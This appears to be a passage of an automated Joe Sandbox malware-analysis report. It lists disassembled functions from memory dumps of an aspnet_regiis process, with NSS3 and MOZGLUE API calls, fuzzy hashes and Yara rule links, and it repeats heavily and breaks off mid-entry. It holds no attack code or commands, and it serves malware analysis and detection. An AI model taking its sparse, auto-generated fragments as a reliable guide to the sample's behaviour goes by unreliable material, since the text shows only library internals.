Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9V<l
API String ID: 2759447159-4087443129
Opcode ID: 3264d3824e21bcf29ce0e46fc9661eea540f17157556c843989dae398b35d1d3
Instruction ID: f37e6aaee96ef2ebf0d8151f301097f05ef8c1341d7d382d199e1ee5ac72cd86
Opcode Fuzzy Hash: 3264d3824e21bcf29ce0e46fc9661eea540f17157556c843989dae398b35d1d3
Instruction Fuzzy Hash: 8A2171B4908605CBDB00EF68C4849AABBF0FF06358F124666DC9496B05E730E895CB92

Function 6C4D2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C4D2CA0
PR_ExitMonitor.NSS3 ref: 6C4D2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C4D2CD1
strdup.MOZGLUE(?), ref: 6C4D2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C4D2D27

Strings

Loaded library %s (static lib), xrefs: 6C4D2D22

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 663f55abd3432803ec9e4fc05cd7a82c1d7ba9698f812f6b85e6257740f23de3
Instruction ID: 53b2f60b1c6a22f9152f5d3a0e7450a68860739040cea3a49584fe1cdee5fc1e
Opcode Fuzzy Hash: 663f55abd3432803ec9e4fc05cd7a82c1d7ba9698f812f6b85e6257740f23de3
Instruction Fuzzy Hash: 3611E1B06012009BEB20DF14DC14E6B77B4AB46719F16803DD80987F41DB36FC08CBA1

Function 6C3C68E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3C68FB
EnterCriticalSection.KERNEL32 ref: 6C3C6913
PORT_FreeArena_Util.NSS3 ref: 6C3C693E
PR_Unlock.NSS3 ref: 6C3C6946
DeleteCriticalSection.KERNEL32 ref: 6C3C6951
free.MOZGLUE ref: 6C3C695D
PR_Unlock.NSS3 ref: 6C3C6968

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 324156d5e1cca5e96db2e0b3e969fca6db66f4674f9cd6ed5c3b37a4ad67b304
Instruction ID: eb9ce07ec9d75d4e373e311939b5f4f61a24feec34dc3850f1fc837e476bd8d1
Opcode Fuzzy Hash: 324156d5e1cca5e96db2e0b3e969fca6db66f4674f9cd6ed5c3b37a4ad67b304
Instruction Fuzzy Hash: 88111FB56046058FDB00BF79C48956EBBF4FF06248F054569D895DBA05EB31E884CF92

Function 6C420FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421000
PR_NewLock.NSS3(?,00000800,6C3BEF74,00000000), ref: 6C421016

Part of subcall function 6C4898D0: calloc.MOZGLUE(00000001,00000084,6C3B0936,00000001,?,6C3B102C), ref: 6C4898E5

PL_InitArenaPool.NSS3(00000000,security,6C3C87ED,00000008,?,00000800,6C3BEF74,00000000), ref: 6C42102B
TlsGetValue.KERNEL32(00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421044
free.MOZGLUE(00000000,?,00000800,6C3BEF74,00000000), ref: 6C421064

Strings

security, xrefs: 6C421025

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 88f5ec113825b07c53923ae0150892f6b82e658e4753456445da074d4a2c9bf9
Instruction ID: c50208c71b7bece17abed1be36f04ec62675df3747c2bee60f84053a94d25948
Opcode Fuzzy Hash: 88f5ec113825b07c53923ae0150892f6b82e658e4753456445da074d4a2c9bf9
Instruction Fuzzy Hash: EF012970A4029057E720AF288C0BE4AB6B4BF03789F020125E81896E51DB7BD945DBD5

Function 6C4649C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C455F34,00000A20), ref: 6C4649EC

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C455F34,00000A20,?,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C4649F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C455F34,00000A20,?,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C464A06
free.MOZGLUE(?,?,?,?,?,6C455F34,00000A20), ref: 6C464A16
free.MOZGLUE(?,?,?,?,?,6C455F34,00000A20), ref: 6C464A1C

Strings

4_El , xrefs: 6C4649C6, 6C464A21

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_El
API String ID: 2193358613-205319157
Opcode ID: 211f4a56474db8393203c8e0c18678a173a3d1c2f3575455a227a20bf4266ce5
Instruction ID: 8571b1ad0437df3bbb7de3d39d5126ccfdd384d907df1432629b41870e71ba1d
Opcode Fuzzy Hash: 211f4a56474db8393203c8e0c18678a173a3d1c2f3575455a227a20bf4266ce5
Instruction Fuzzy Hash: CF014C76A01104ABDB00CF69DC94C967BFCEF892897058065E909CBB05E731E909CBA1

Function 6C462E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C463046

Part of subcall function 6C44EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C437FFB), ref: 6C46312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C463154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C462E8B

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

Part of subcall function 6C44F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C439BFF,?,00000000,00000000), ref: 6C44F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C437FFA), ref: 6C462EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C46317B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 765ed9ed71745d766d71c8290e97068a1368315904fd63635cb2c847249f8f7d
Instruction ID: 26122b525954e9712ff7358dcfc139652238e7c5418890b3d11a02b30fe046ea
Opcode Fuzzy Hash: 765ed9ed71745d766d71c8290e97068a1368315904fd63635cb2c847249f8f7d
Instruction Fuzzy Hash: AAA1BC71A00218AFDB24CF55CC84FEAB7B5EF49308F148099E94967B45E731AD85CF92

Function 6C41A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef59a8f7405fa35b9ba8467f909d25a6022cd75d86f6ee636c99625567f30d6
Instruction ID: 28e4e83ac9540a64689cfdeb300c8d68a5514f2212f8759add628143b9ff6155
Opcode Fuzzy Hash: aef59a8f7405fa35b9ba8467f909d25a6022cd75d86f6ee636c99625567f30d6
Instruction Fuzzy Hash: C4912A30D0C6684BCB25CE188891FFAB7B69F4A31DF1941E9C5D99BF01D631898E8BD1

Function 6C42ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C42ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C42EDCE

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

free.MOZGLUE(00000000,?,?,?,?,6C42B04F), ref: 6C42EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C42EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C42EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C42EEFB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: c4e740e8632539df0929161f86d320fd805df115385c35d63ca7e77961f34ba1
Instruction ID: 9a827a504ec6cbebe32ba98b81742f686a2d18daa2282204a8f0bcd7435c26b2
Opcode Fuzzy Hash: c4e740e8632539df0929161f86d320fd805df115385c35d63ca7e77961f34ba1
Instruction Fuzzy Hash: 69816CB5A012059FEB14CF65C886FAAB7F5BF4830AF14442CE8259BB51D739E814CBE1

Function 6C42CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C42C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C42DAE2,?), ref: 6C42C6C2

PR_Now.NSS3 ref: 6C42CD35

Part of subcall function 6C489DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DC6
Part of subcall function 6C489DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DD1
Part of subcall function 6C489DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C489DED

Part of subcall function 6C416C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3C1C6F,00000000,00000004,?,?), ref: 6C416C3F

PR_GetCurrentThread.NSS3 ref: 6C42CD54

Part of subcall function 6C489BF0: TlsGetValue.KERNEL32(?,?,?,6C4D0A75), ref: 6C489C07

Part of subcall function 6C417260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3C1CCC,00000000,00000000,?,?), ref: 6C41729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C42CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C42CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C42CE2C

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C42CE40

Part of subcall function 6C4214C0: TlsGetValue.KERNEL32 ref: 6C4214E0
Part of subcall function 6C4214C0: EnterCriticalSection.KERNEL32 ref: 6C4214F5
Part of subcall function 6C4214C0: PR_Unlock.NSS3 ref: 6C42150D

Part of subcall function 6C42CEE0: PORT_ArenaMark_Util.NSS3(?,6C42CD93,?), ref: 6C42CEEE
Part of subcall function 6C42CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C42CD93,?), ref: 6C42CEFC
Part of subcall function 6C42CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C42CD93,?), ref: 6C42CF0B
Part of subcall function 6C42CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C42CD93,?), ref: 6C42CF1D

Part of subcall function 6C42CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF47
Part of subcall function 6C42CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF67
Part of subcall function 6C42CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C42CD93,?,?,?,?,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF78

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 5038275a32d659528d4d758e9f727411f21fdd1258b1fc0779336d3c777f753f
Instruction ID: 2133c69f9aafba3e0af1dd12aa3861741f2160412b4a60bbce73367f690d8b24
Opcode Fuzzy Hash: 5038275a32d659528d4d758e9f727411f21fdd1258b1fc0779336d3c777f753f
Instruction Fuzzy Hash: 6F51B1B6A011009BFB10DF69DC42FAA73F4EF48349F250528D849A7B40EB39E905CBD1

Function 6C3FEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C3FEF38

Part of subcall function 6C3E9520: PK11_IsLoggedIn.NSS3(00000000,?,6C41379E,?,00000001,?), ref: 6C3E9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C3FEF53

Part of subcall function 6C404C20: TlsGetValue.KERNEL32 ref: 6C404C4C
Part of subcall function 6C404C20: EnterCriticalSection.KERNEL32(?), ref: 6C404C60
Part of subcall function 6C404C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C404CA1
Part of subcall function 6C404C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C404CBE
Part of subcall function 6C404C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C404CD2
Part of subcall function 6C404C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C404D3A

PR_GetCurrentThread.NSS3 ref: 6C3FEF9E

Part of subcall function 6C489BF0: TlsGetValue.KERNEL32(?,?,?,6C4D0A75), ref: 6C489C07

free.MOZGLUE(00000000), ref: 6C3FEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C3FF016
free.MOZGLUE(00000000), ref: 6C3FF022

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: d8b4c2c24da7622c7f6ce6857392dd836d434991ea07052ac142e5badbf0f1ee
Instruction ID: 2c655a50b2fc896075dc570360b834b4fe1723875a49c02af2f9d48d5ae9fde7
Opcode Fuzzy Hash: d8b4c2c24da7622c7f6ce6857392dd836d434991ea07052ac142e5badbf0f1ee
Instruction Fuzzy Hash: C541A3B1E0020AABDF018FA9DC45AEE7AB9AB48358F044029F914A7750E772C915CFA1

Function 6C3D4860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D4894

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D48CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D48DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C3D48FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C3D4912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3D494A

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 645740b7cfb8e8805bd428ce0dc1f1d4e8556358ec01e84cc42e1083156e4f30
Instruction ID: 7bdc8e168e250a194aa8651cca76a262e51f8d83ec2ae0e2845b62e70d5ef97e
Opcode Fuzzy Hash: 645740b7cfb8e8805bd428ce0dc1f1d4e8556358ec01e84cc42e1083156e4f30
Instruction Fuzzy Hash: C041B4B2A083055BE700CF6AD881F6B73E8AF4825CF15052CEA5997B41F772E944CF92

Function 6C3ECF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C3ECF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C3ED002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C3ED016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3ED025
PR_NewLock.NSS3 ref: 6C3ED043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C3ED074

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 3437820cff0e9c12a3f9bc8a08b1b6435922431d0fc8470609c2b1c3f1f03c80
Instruction ID: c2592b79c2f61de5c2328784a3548f56f2d24415f55db7d54d9bcc95a108f28d
Opcode Fuzzy Hash: 3437820cff0e9c12a3f9bc8a08b1b6435922431d0fc8470609c2b1c3f1f03c80
Instruction Fuzzy Hash: 52418EB0A012218FEB50DF29D884BDA7BA4AF4C318F15416ADC198BB46D776D885CFE1

Function 6C3D2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C3C2D1A), ref: 6C3D2E7E

Part of subcall function 6C4207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C3C8298,?,?,?,6C3BFCE5,?), ref: 6C4207BF
Part of subcall function 6C4207B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4207E6
Part of subcall function 6C4207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C42081B
Part of subcall function 6C4207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C420825

PR_Now.NSS3 ref: 6C3D2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C3D2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C3C2D1A), ref: 6C3D2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C3C2D1A), ref: 6C3D2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C3D2F81

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

